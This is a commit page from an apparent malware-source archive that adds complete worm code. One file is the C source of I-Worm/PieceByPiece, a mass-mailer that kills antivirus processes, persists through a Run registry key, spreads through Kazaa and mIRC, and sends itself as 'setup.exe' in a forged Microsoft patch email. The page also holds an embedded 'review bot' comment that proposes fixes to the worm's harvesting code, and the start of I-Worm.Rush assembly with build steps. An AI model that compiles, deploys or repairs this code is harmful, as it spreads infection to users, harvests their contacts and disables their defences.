
Add files via upload

This commit is contained in:
vxunderground 2020-10-09 22:16:57 -05:00 committed by GitHub
parent 9cbdb38457
commit 1ffdfd1526
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
85 changed files with 21199 additions and 0 deletions

Win32/I-Worm.PieceByPiece.c Normal file

@ -0,0 +1,878 @@
/*
I-Worm/PieceByPiece Copyright (C) 2002 MI_pirat [Red-Cell] inc.
For educational purpose only. Distribute under GPL.
Some lyrics from the song that inspired me:
"Cause nothing ever lasts forever
We're like flowers in this vase, together
You and me, it's pulling me down
Tearing my down, piece by piece
And you can't see
That's it's like a disease
Killing me now, it's so hard to breathe"
-Feeder <Piece by Piece>
*/
#include <winsock.h>
#include <fstream.h>
#include <tlhelp32.h>
#include <string.h>
#include <stdlib.h>
//--------------------------------------GLOBAL VARIABLES-------------------------------------
HWND hwnd;
WORD version = MAKEWORD(1,1);
WSADATA wsaData;
int nRet;
char Buf[256],myBuf[256],ch[1],ch2[256],server[]="smtp.barrysworld.com",email[]="john@barrysworld.com",helo[]="barrysworld.com";
char emails[50][100],windir[MAX_PATH],filename[MAX_PATH],winbkup[MAX_PATH],zippth[MAX_PATH];
char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256];
SOCKET theSocket;
int i,err=0,c=0,connected=0,tim,sending=0;
SYSTEMTIME time;
double k;
DWORD basesize,ProcessId;
//--------------------------------------WNDPROC-----------------------------------------------
LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam);
//--------------------------------------GETASC------------------------------------------------
int getasc(char chr[1]) {
int i=0;
char c[1];
for (i=0;i<257;i++) {
c[0]=i;
if (chr[0]==c[0]) { return(i); }
}
}
//--------------------------------------BASE64-----------------------------------------------
void base64(char *file) { //Encodes a file using the "base 64" encoding
WIN32_FIND_DATA fis; //It's kinna shitty code, but it works just GREAT!
int i,j,n,done=0,k=0,lin=0;
double c=0;
char tmp[7];
DWORD totsize;
char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'};
fstream f(file,ios::in | ios::binary), g("C:\\Msbootlog.sys",ios::out);
FindFirstFile(file,&fis);
totsize=fis.nFileSizeLow; //Get the file size in bytes
for (c=0;c<totsize/3;c++) { //Encode 'till no more 3 char chunks are available
buc1[0]=0;
xxx[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
buc2[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc2[i]='0';
buc2[i]=0;
strcat(buc2,cx2);
} else strcpy(buc2,cx2);
buc3[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc3[i]='0';
buc3[i]=0;
strcat(buc3,cx2);
} else strcpy(buc3,cx2);
xxx[0]=0;
strcpy(xxx,buc1);
done=0;
k=0;
while (done!=24) {
for (i=done;i<done+6;i++) {
tmp[k]=xxx[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
}
//One char left so add 4 0s at the end
if (totsize%3==1) {
buc1[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
strcat(buc1,"0000");
done=0;
k=0;
while (done!=12) {
for (i=done;i<done+6;i++) {
tmp[k]=buc1[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
g<<"==";
}
//Two chars left so add 2 0s at the end
if (totsize%3==2) {
buc1[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
strcat(buc1,"00");
done=0;
k=0;
while (done!=18) {
for (i=done;i<done+6;i++) {
tmp[k]=buc1[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
g<<"=";
}
f.close();
g.close();
//Get the size of the encoded file
FindFirstFile("C:\\Msbootlog.sys",&fis);
basesize=fis.nFileSizeLow;
}
//--------------------------------------SENDMAIL---------------------------------------------
void sendmail() { //Sends an e-mail with MIME encoding
int ran;
sending=1;
//"HELO" the server
strcpy(myBuf, "HELO <");
strcat(myBuf,helo);
strcat(myBuf,">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') {
strcpy(myBuf, "MAIL FROM:<");
strcat(myBuf,email);
strcat(myBuf,">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) {
GetSystemTime(&time);
srand(time.wSecond);
ran=rand();
while (ran>c) {
srand(c);
ran=ran-rand();
}
if (ran<0) ran=ran*(-1);
strcpy(myBuf, "RCPT TO:<");
strcat(myBuf, emails[ran]);
strcat(myBuf, ">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='5' && err==0) {
strcpy(myBuf, "DATA\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) {
if (stricmp(email,"john@barrysworld.com")==0) { //if we use the hard-coded e-mail address
strcpy(myBuf, "Reply-To: \"Microsoft\" <microsoft@microsoft.com>\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "From: \"Microsoft\" <information@microsoft.com>\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Subject: Internet Explorer vulnerability patch\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
} else { //if we find a new address
strcpy(myBuf, "From: <");
strcat(myBuf, email);
strcat(myBuf, ">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Subject: Hello\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
}
strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: multipart/mixed;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " boundary = \"bla\"\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X-Priority: 3\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X -MSMail - Priority: Normal\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X-Mailer: mailer@localhost\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "--bla\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: text/plain; charset:us-ascii\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "You will find all you need in the attachment.\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "--bla\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: application/x-msdownload;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " name = \"setup.exe\"\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Disposition: attachment;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " filename = \"setup.exe\"\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
//Send the file byte by byte
fstream f("C:\\Msbootlog.sys",ios::in);
for (k=0;k<basesize;k++) {
f.get(ch[1]);
strcpy(myBuf,&ch[1]);
send(theSocket,myBuf,strlen(myBuf),0);
}
f.close();
strcpy(myBuf, "\x0d\x0a--bla--\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "\x0d\x0a.\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
strcpy(myBuf, "QUIT\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
}
//--------------------------------------GETPROCESSMODULE------------------------------------
BOOL GetProcessModule (DWORD dwPID, DWORD dwModuleID,
LPMODULEENTRY32 lpMe32, DWORD cbMe32)
{
BOOL bRet = FALSE;
BOOL bFound = FALSE;
HANDLE hModuleSnap = NULL;
MODULEENTRY32 me32 = {0};
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID);
if (hModuleSnap == (HANDLE)-1)
return (FALSE);
me32.dwSize = sizeof(MODULEENTRY32);
if (Module32First(hModuleSnap, &me32))
{
do
{
if (me32.th32ModuleID == dwModuleID)
{
CopyMemory (lpMe32, &me32, cbMe32);
bFound = TRUE;
}
}
while (!bFound && Module32Next(hModuleSnap, &me32));
bRet = bFound;
}
else
bRet = FALSE;
CloseHandle (hModuleSnap);
return (bRet);
}
//--------------------------------------PROCESSES---------------------------------------------
BOOL processes() //Various stuff with processes
{
HANDLE hProcessSnap = NULL;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
DWORD dwPriorityClass;
BOOL bGotModule = FALSE;
MODULEENTRY32 me32 = {0};
do
{
bGotModule = GetProcessModule(pe32.th32ProcessID,
pe32.th32ModuleID, &me32, sizeof(MODULEENTRY32));
if (bGotModule)
{
HANDLE hProcess;
hProcess = OpenProcess (PROCESS_ALL_ACCESS,
FALSE, pe32.th32ProcessID);
dwPriorityClass = GetPriorityClass (hProcess);
//Get the virus' filename
if (me32.th32ProcessID==ProcessId) strcpy(filename,me32.szExePath);
//Anti AVs
if (strstr(me32.szModule,"AV")!=0 || strstr(me32.szModule,"F-")!=0 || strstr(me32.szModule,"av")!=0) {
TerminateProcess(hProcess,0);
}
//Close the handle
CloseHandle (hProcess);
}
}
while (Process32Next(hProcessSnap, &pe32));
bRet = TRUE;
}
else
bRet = FALSE;
CloseHandle (hProcessSnap);
return (bRet);
}
//--------------------------------------FINDSERVER--------------------------------------------
void findserver() { //Gets a SMTP server and user name from the registry (if possible)
int i,j;
char key2[256];
unsigned char acc[1024],smtp[1024],eml[1024];
DWORD acclen=sizeof(acc), smtplen=sizeof(smtp), emllen=sizeof(eml);
HKEY hKey;
//Try getting a SMTP server from registry
strcpy(key2,"Software\\Microsoft\\Internet Account Manager");
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"Default Mail Account",0,NULL,acc,&acclen);
RegCloseKey(hKey);
strcpy(key2,"Software\\Microsoft\\Internet Account Manager\\Accounts\\");
j=strlen(key2);
for (i=0;i<8;i++){
key2[j+i]=acc[i];
}
key2[j+i]=0;
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen);
RegCloseKey(hKey);
if (smtp[0]>44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with
i=0; //the new one
while (smtp[i]!=0) {
server[i]=smtp[i]; //Now this is the SMTP server
i++;
}
server[i]=0;
//Get the e-mail
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen);
RegCloseKey(hKey);
if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with
i=0; //the new one
while (eml[i]!=0) {
email[i]=eml[i]; //Now this is the "FROM:" e-mail
i++;
}
email[i]=0;
}
//Set a new "HELO" domain
i=strlen(email)-1;
j=0;
while (email[i]!='@') {
helo[j]=email[i];
j++;
i--;
}
}
helo[j]=0;
strrev(helo);
//end
}
//--------------------------------------FINDMAIL----------------------------------------------
void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files
{
int ik,j=0;
char lin[256],*start,ch[1];
fstream f(file,ios::in);
while (f.get(lin,256))
{
start=strstr(lin,"mailto:");
if (start!=0)
{
j=0;
c++;
ik=start-lin+7;
ch[1]=lin[ik];
while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63)
{
emails[c][j]=ch[1];
j++;
ik++;
ch[1]=lin[ik];
}
emails[c][j]=0;
}
f.get();
}
f.close();
}
//--------------------------------------FINDFILES---------------------------------------------
void findfiles() { //Searches for .htm files in the temp. directories
WIN32_FIND_DATA f;
HANDLE hf;
int k=0;
char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH];
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\*");
hf=FindFirstFile(pth2,&f);
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
k++;
}
FindClose(hf);
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\*");
k=0;
hf=FindFirstFile(pth2,&f);
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
k++;
}
FindClose(hf);
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\");
strcat(pth2,pth3);
strcpy(pth,pth2);
strcat(pth,"\\");
strcat(pth2,"\\*.htm");
k=0;
hf=FindFirstFile(pth2,&f);
while (FindNextFile(hf,&f)!=0 && k<70) {
if (f.cFileName[0]!='.') {
strcpy(path,pth);
strcat(path,f.cFileName);
findmail(path);
}
k++;
}
FindClose(hf);
}
//--------------------------------------CONECT------------------------------------------------
int conect() { //Connects to a server using "Winsock"
// Start up Winsock
i=WSAStartup(version, &wsaData);
if (i!=0) {return(0);}
// Store information about the server
LPHOSTENT lpHostEntry;
lpHostEntry = gethostbyname(server);
if (lpHostEntry == NULL) {
WSACleanup();
connected=0;
return(0);
} else connected=1; //This means we're connected
//Get important data
if (err==0) { //If we didn't run this allready and got an error
findserver();
findfiles();
}
// Create the socket
theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (theSocket == INVALID_SOCKET) {
WSACleanup();
connected=0;
return(0);
}
SOCKADDR_IN saServer;
saServer.sin_family = AF_INET;
saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
saServer.sin_port = htons(25);
// Connect to the server
nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}
nRet = recv(theSocket,Buf,sizeof(Buf),0);
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') {
sendmail();
}
//Close the connection
closesocket(theSocket);
// Shutdown Winsock
WSACleanup();
}
//--------------------------------------KAZAA-----------------------------------------------
void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder"
int i;
char kaza[256],kfile[3][20];
unsigned char kpth[1024];
DWORD kpthlen=sizeof(kpth);
HKEY hKey;
//The filenames
strcpy(kfile[0],"\\mirc6.exe");
strcpy(kfile[1],"\\winamp3.exe");
strcpy(kfile[2],"\\wincrack.exe");
strcpy(kfile[3],"\\icq2002.exe");
//Get the path to Kazaa from the reg.
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen);
RegCloseKey(hKey);
if (kpth[0]>64 && kpth[0]<123) {
i=0;
while (kpth[i]!=0) {
kaza[i]=kpth[i];
i++;
}
kaza[i]=0;
}
GetSystemTime(&time);
srand(time.wSecond);
if (rand()%5==0) strcat(kaza,kfile[3]);
else if (rand()%4==0) strcat(kaza,kfile[2]);
else if (rand()%3==0) strcat(kaza,kfile[1]);
else if (rand()%2==0) strcat(kaza,kfile[0]);
CopyFile(file,kaza,FALSE);
}
//--------------------------------------INFECTWIN-------------------------------------------
void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe
HKEY hKey;
unsigned char val[256];
char rnd[6];
int i=0;
strcpy(winbkup,windir);
strcat(winbkup,"\\System\\winsys");
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(winbkup,rnd);
strcat(winbkup,".exe");
//Copy file to Windows
CopyFile(file,winbkup,TRUE);
//Just in case there is no WinZip, use this path
strcpy(zippth,winbkup);
//Now make Windows run it at startup
while (winbkup[i]!=0) {
val[i]=winbkup[i];
i++;
}
val[i]=0;
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val));
RegCloseKey(hKey);
}
//--------------------------------------MIRC--------------------------------------------------
void mirc() { //Creates a mIRC script
HKEY hKey;
unsigned char mircpth[1024];
char mirc[MAX_PATH];
int i=0;
DWORD mircpthlen=sizeof(mircpth);
//Get the path from our friend: the registry :)
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen);
RegCloseKey(hKey);
i=1;
while (mircpth[i]!=0 && mircpth[i]!='.') {
mirc[i-1]=mircpth[i];
i++;
}
mirc[i-1]=0;
i=strlen(mirc);
while (mirc[i]!=92) {
mirc[i]=0;
i--;
}
strcat(mirc,"script.ini");
//Write a new script.ini
fstream f(mirc,ios::out);
f<<"[Script]"<<endl;
f<<"n0=ON 1:JOIN:#:{"<<endl;
f<<"n1=/dcc send $nick "<<zippth<<endl;
f<<"n2=}"<<endl;
f<<"n3=on 1:start:{"<<endl;
f<<"n4= /join #piecebypiece"<<endl;
f<<"n5=}"<<endl;
f.close();
}
//--------------------------------------ZIPIT-------------------------------------------------
void zipit(char *file) { //Zips the virus with a random name
HKEY hKey;
unsigned char zip[1024];
char zippath[MAX_PATH],param[MAX_PATH],rnd[6];
int i=0;
DWORD ziplen=sizeof(zip);
//Get the path from the registry
i=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hKey);
if (i==ERROR_SUCCESS) { //If WinZip is installed then zip the file
RegQueryValueEx(hKey,"",0,NULL,zip,&ziplen);
RegCloseKey(hKey);
i=0;
while (zip[i]!=0) {
zippath[i]=zip[i];
i++;
}
zippath[i]=0;
//Make a random filename for the .zip file
strcpy(zippth,windir);
strcat(zippth,"\\System\\win32sys");
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(zippth,rnd);
strcat(zippth,".zip");
//Zip it!
strcpy(param," -a -r ");
strcat(param,zippth);
strcat(param," ");
strcat(param,file);
ShellExecute(hwnd,"open",zippath,param,NULL,SW_HIDE);
} else strcpy(zippth,file); //Else just use the executable file for mIRC
}
//--------------------------------------TIMERPROC---------------------------------------------
VOID CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) {
if (sending==0) { //Check for a connection if a mail is not under delivery
conect();
if (err!=0) { //if the server used encountered an error, try using the hard-coded serv.
strcpy(server,"smtp.barrysworld.com");
strcpy(email,"john@barrysworld.com");
strcpy(helo,"barrysworld.com");
conect();
}
if (connected==1) KillTimer(hwnd,tim); //Don't need to check for it again, but keep resident
}
}
//--------------------------------------PAYLOAD-----------------------------------------------
void payload() { //Every virus MUST have a payload ;)
MessageBox(NULL,"\"Cause nothing ever lasts forever\nWe're like flowers in this vase, together\nYou and me, it's pulling me down\nTearing my down, piece by piece\nAnd you can't see\nThat's it's like a disease\nKilling me now, it's so hard to breathe\"\n\t-Feeder <Piece by Piece>","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL);
}
//--------------------------------------------------------------------------------------------
//Main function
//--------------------------------------------------------------------------------------------
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){
WNDCLASSEX wndc;
MSG msg;
HKEY hKey;
unsigned char buf[1024],inf[]="yes";
DWORD buflen=sizeof(buf);
int first=0;
//Create a window
wndc.cbClsExtra = 0;
wndc.cbSize = sizeof(wndc);
wndc.cbWndExtra = 0;
wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH);
wndc.hCursor = LoadCursor(NULL,IDC_ARROW);
wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION);
wndc.hInstance = hInstance;
wndc.lpfnWndProc = WndProc;
wndc.lpszClassName = "ClassName";
wndc.lpszMenuName = NULL;
wndc.style = CS_HREDRAW|CS_VREDRAW;
RegisterClassEx(&wndc);
hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL);
UpdateWindow(hwnd);
//Hide the window
ShowWindow(hwnd,SW_HIDE);
//Get the filename and disable (if possible) any AVs
GetWindowThreadProcessId(hwnd,&ProcessId);
processes();
GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir
//Check if the comp. was infected before
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen);
RegCloseKey(hKey);
if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s')
{
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey);
//Create a key in the registry to mark the PC as infected
RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf));
RegCloseKey(hKey);
//----INFECT COMPUTER----
infectwin(filename);
kazaa(filename);
zipit(winbkup);
mirc();
base64(filename);
conect();
first=1;
MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP);
}
base64(filename);
GetSystemTime(&time);
if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania)
if (first==0) {
base64(filename); //Write a "base64" encoded file every time (just in case)
conect(); //Try to connect
if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv.
strcpy(server,"smtp.barrysworld.com");
strcpy(email,"john@barrysworld.com");
strcpy(helo,"barrysworld.com");
conect();
}
}
if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs.
while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-)
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
//end of main()
}
//--------------------------------------WNDPROC----------------------------------------------
LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) {
HDC hdc;
PAINTSTRUCT ps;
switch(iMsg){
case WM_PAINT:
hdc = BeginPaint(hwnd,&ps);
EndPaint(hwnd,&ps);
return 0;
case WM_DESTROY:
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hwnd,iMsg,wParam,lParam);
}
//That's all folks! e-mail to: MI_pirat@yahoo.com , web:
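Review bot: findmail() writes into the fixed `emails[50][100]` table without bounding either index: the `c++` just before the copy is never checked against 50, and the copy loop stops only on `"`, `:`, space, `>` or `?`, so a line carrying none of those after `mailto:` runs past the terminator of `lin` and past the 100-byte row. The same function, plus the byte loops in base64() and sendmail(), read and write one-element arrays at `[1]` (`ch[1]`, `cx[1]`), one past the end; the code only appears to work because the adjacent globals absorb the stray byte. A bounded version of the copy would be `if (c>=49) break;` ahead of the increment and `while (ch[0]!=0 && ch[0]!=34 && ch[0]!=58 && ch[0]!=32 && ch[0]!=62 && ch[0]!=63 && j<99)`, with every `ch[1]` and `cx[1]` changed to index 0. Since this is a complete mass-mailer (SMTP sender, AV process killer in processes(), Kazaa and mIRC droppers), the file header should carry `// ARCHIVED MALWARE SOURCE (I-Worm/PieceByPiece): kept for analysis only, do not build or run outside an isolated lab` so a corpus reader is not misled by the "educational" line.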

Win32/I-Worm.Pilif.7z Normal file

Binary file not shown.

Win32/I-Worm.Rush.asm Normal file

@ -0,0 +1,498 @@
comment #
Name : I-Worm.Rush
Author : PetiK
Date : August 27th - September 2nd
Size : 5632 byte (compiled with UPX tool)
Action : Copy itself to
* WINDOWS\SYSTEM\Mail32.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Mail Outlook = WINDOWS\SYSTEM\Mail32.exe
* On Wednesday it opens the cdrom
* The 3rd it produces a sound
* the 15th it alters "Search Page", "Start Page", and "Local Page" by
* Creates %personal%\Read_Me.txt with a text
* A vbs file search all email in the Oultook software and put them in the Mailbook.txt.
The worm scans the file to find email.
Subject : New Scan Virus...
Body : Hi man,
I send you the last update of ScanVir (v 2.5).
Look at the file attached.
Bye and have a nice day.
Attached : ScanVir_25.exe
* Scans title of windows :
- Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
- System Properties => Minimize the window
To build the worm:
@echo off
tasm32 /ml /m9 Rush
tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
upx -9 Rush.exe
if exist *.obj del *.obj
if exist *.map del *.map
To delete the worm:
del %windir%\system\Mail32.exe
del %personal%\Read_Me.txt
del %windir%\MailBook.txt
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
;call hide_worm
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
callx GetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,".23l"
stosd
mov eax,"exe"
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
push 8
push edi
push 1
@pushsz "Mail Outlook"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
check_date:
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne beep1
cdrom_open:
push 00h
push 00h
push 00h
@pushsz "open cdaudio"
callx mciSendStringA
push 00h
push 00h
push 00h
@pushsz "set cdaudio door open"
callx mciSendStringA
beep1: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],03h
jne special_folder
mov counter,0
beep2: inc counter
push 30h
callx MessageBeep
push 1
callx Sleep
cmp counter,5000
jne beep2
special_folder:
push 00h
push 05h
push offset personal
push 00h
callx SHGetSpecialFolderPathA
@pushsz "\Read_Me.txt"
push offset personal
callx lstrcat
txt_file:
push 00h
push 01h
push 02h
push 00h
push 01h
push 40000000h
push offset personal
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push TXTSIZE
push offset txtd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\rushhour.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\rushhour.vbs"
callx WinExec
push 2000
callx Sleep
